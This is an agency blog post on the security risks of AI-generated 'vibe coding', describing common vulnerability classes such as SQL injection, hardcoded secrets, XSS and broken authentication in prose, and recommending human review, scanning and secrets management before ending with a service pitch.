Are you for or against having an AI write your code? Either way, the movement is here, and it has a name – vibe coding. First coined by Andrej Karpathy, it has raised a lot of questions about how safe the practice is to use, especially for non-developers. As enterprises and solo developers alike embrace AI coding assistants, questions around security testing become critical.
Spoiler: Not as well as we’d like.
Tools
With platforms like ChatGPT, Cursor, or Replit, users can describe what they want in plain English, and the AI generates the code. This makes coding accessible to a broader audience, turning ideas into prototypes without deep technical skills. It also allows those of different backgrounds to bring their ideas to software development.
Like all tools, it all depends on how you use them.
Risks
When used for low-stakes applications where security isn’t a massive concern, vibe coding isn’t a threat. In any larger high-stakes application, like crypto and DeFi, though, it’s not recommended. Especially for non-coders.
If the code an AI was trained on is filled with vulnerabilities, it can replicate those problems. Plus, AI often isn’t up to date on the latest security, so it can recommend dodgy third-party resources.
We’ve compiled some cases below of the problems in AI-generated code that you might find of interest. We’ve already seen cases where AI-generated code has included:
SQL injections
If a program takes user input and sends it straight to the database, an attacker can include extra commands. Those commands run with the same privileges and let them read, change, or delete data. So SQL injections can slip in whenever your AI assistant builds database queries from unvalidated inputs.

Hardcoded secrets or keys
Last year, security researcher Bill Demirkapi uncovered over 15,000 hardcoded secrets, including passwords and API keys, in publicly accessible code repositories. This only happened because AI-generated code often inadvertently includes sensitive information.
Embedding passwords, API keys, or certificates directly in code means anyone with access to the code can find them and impersonate your application. Hardcoded secrets often creep in because the model can’t differentiate between safe and unsafe key management.
Lionel Acevado built his SaaS with Cursor, an AI code editor, touting how great his SaaS was on social media. The flood gates opened as the internet took it apart. People took advantage of unsecured API keys and were able to bypass paywalls. Acevado has since said he will be learning how to code his SaaS applications in the future.
Some AI tools have built-in security capable of flagging common vulnerabilities. Like SQL injection or hardcoded secrets.
Cross-site scripting (XSS)
A study analysing code snippets generated by AI code generation tools found a significant portion of these snippets contained security weaknesses, including XSS vulnerabilities. When a site shows user-provided text on a page without cleaning it first, someone can embed small scripts. Those run in other users’ browsers, letting the attacker steal cookies, hijack sessions, or redirect users. XSS vulnerabilities may occur if your AI tool echoes user data into a page without sanitisation.
Improper cryptography
The same study previously mentioned also found AI-generated code used ‘broken or risky cryptographic algorithms’. Using outdated or home-grown encryption methods can leave data exposed. So if the algorithm is weak or implemented incorrectly, attackers can decrypt sensitive information. Improper cryptography comes up when AI suggests outdated or misconfigured encryption routines.
Broken authentication logic
A 2021 study testing the security of AI-generated code contributions (specifically Copilot) found 40% of the generated samples insecure. A significant portion of these snippets contained security weaknesses, including broken authentication logic. As a result of improper handling of user credentials and session management.
More recently, the Solana Exploit demonstrated the consequences of deploying that unverified AI-generated code. In early 2025, a user lost $2,500 after using a ChatGPT-generated code snippet without proper validation. The code included a malicious API link that led to a phishing site.
So What do You do
According to the 2024 Stack Overflow Developer Survey, 76% of the respondents are using or plan to use AI tools in their development process. Up from 70% the previous year. A 2024 GitHub survey showed that 97% of developers have used AI coding tools at some point.
The tools used by Vibe Coding are a double-edged sword. It all depends on the context you use them in and how much you understand. These AI code generation tools can still be useful, especially in the idea stage.
Below is a breakdown of safe practices you can follow, whether you’re a developer or just experimenting with AI-generated code.
Human-in-the-Loop Review
Always have a person check the code before using it. AI tools can write functional code, but they don’t fully understand context or security.
Independent Vulnerability Scans
Don’t rely solely on built-in AI tooling. Augment your IDE with external security tools (like GitLab, Checkmarx, or Veracode) to detect issues early, especially ones the AI might miss.
Third-Party Validation
Double-check any external libraries or code snippets suggested by the AI. Just because an AI recommends a package doesn’t mean it’s trustworthy or still maintained.
Automated Testing Pipelines
Integrate static and dynamic analysis tools (SAST/DAST) into your CI/CD pipelines. These add a layer of automated checks that can catch vulnerabilities across every branch.
Secrets Management
Enforce policies to prevent hardcoded secrets. Use vaults, environment variables, and secrets management platforms to keep keys and credentials secure.
Ongoing Training
Upskill your team. Understanding how AI generates code—and where it might go wrong—empowers developers to catch and correct issues proactively.
Layered Defence
No single method will catch everything. Combine AI tools, human oversight, and automated testing to build a layered approach to secure development.
By embedding these practices, security professionals can use AI-generated code securely.

How We Can Help
At our agency, we combine the speed of AI with the reliability of expert review—so you get the best of both worlds. Whether you’re exploring an idea, building a proof of concept, or deploying a secure application, we can support you at every stage.
We do not officially offer AI code generation auditing as a service yet. But, we know how fast things are changing and it can be hard to feel confident about what is secure or reliable.
If you are trying out AI tools or thinking about using them in your project, we are here to help.
Whether you want a second opinion on some AI-generated code, help navigating security concerns, or just someone to talk through your options with, feel free to get in touch.